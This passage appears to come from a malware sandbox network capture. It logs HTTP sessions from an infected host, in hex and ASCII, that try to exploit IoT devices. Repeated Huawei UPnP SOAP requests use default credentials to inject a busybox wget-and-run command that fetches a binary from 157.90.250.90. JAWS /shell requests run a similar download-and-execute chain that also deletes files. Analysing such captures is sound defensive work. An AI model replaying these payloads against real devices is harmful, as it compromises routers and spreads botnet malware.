3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:11.366691113 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:15.142281055 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:22.565121889 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:37.155067921 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          477192.168.2.2333838209.212.159.21580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:09.542470932 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:09.687874079 CET392INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:09 GMT
                                                          Server: Apache
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          478192.168.2.2343294192.126.242.16280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:09.578836918 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:09.760179996 CET1286INHTTP/1.1 400 Bad Request
                                                          Server: squid/3.5.20
                                                          Mime-Version: 1.0
                                                          Date: Tue, 02 Jan 2024 05:26:54 GMT
                                                          Content-Type: text/html;charset=utf-8
                                                          Content-Length: 3536
                                                          X-Squid-Error: ERR_INVALID_URL 0
                                                          Connection: close
                                                          Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 73 71 75 69 64 2d 69 6e 74 65 72 6e 61 6c 2d 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 53 4e 2e 70 6e 67 27 29 20
                                                          Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('/squid-internal-static/icons/SN.png')
                                                          Jan 2, 2024 06:25:09.760232925 CET1286INData Raw: 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20
                                                          Data Ascii: no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content
                                                          Jan 2, 2024 06:25:09.760245085 CET1220INData Raw: 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 32 3e 0a 3c 2f 64 69 76 3e 0a 3c 68 72 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 54 68 65 20 66 6f 6c 6c 6f 77
                                                          Data Ascii: sted URL could not be retrieved</h2></div><hr><div id="content"><p>The following error was encountered while trying to retrieve the URL: <a href="/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws">/shell?cd+/tmp;rm+-rf+*;wget+


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          479192.168.2.2337018221.153.44.20180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:09.681418896 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:09.964112997 CET62INHTTP/1.0 400 Bad Request
                                                          Connection: Keep-Alive
                                                          Jan 2, 2024 06:25:09.964147091 CET123INData Raw: 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 32 30 0d 0a 58 2d 43 6c 61 63 6b 73 2d 4f 76 65 72 68 65 61 64 3a 20 47 4e 55 20 54 65 72 72 79 20 50 72 61 74 63 68 65 74 74 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74
                                                          Data Ascii: Keep-Alive: timeout=20X-Clacks-Overhead: GNU Terry PratchettContent-Type: text/html<h1>Bad Request</h1>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          480192.168.2.2335052208.109.68.2380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:09.832340956 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:11.255037069 CET1286INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:25:09 GMT
                                                          Server: Apache
                                                          X-Powered-By: PHP/7.4.33
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Retry-After: 86400
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade, close
                                                          Vary: Accept-Encoding
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 61 73 6b 69 6e 20 4d 65 64 69 61 20 69 73 20 75 6e 64 65 72 20 63 6f 6e 73 74 72 75 63 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 20 64 69 67 69 74 61 6c 2c 20 67 6c 6f 62 61 6c 20 65 6e 74 65 72 74 61 69 6e 6d 65 6e 74 20 63 6f 6d 70 61 6e 79 2e 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 46 72 65 65 20 55 6e 64 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 50 61 67 65 20 70 6c 75 67 69 6e 20 66 6f 72 20 57 6f 72 64 50 72 65 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 39 30 30 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 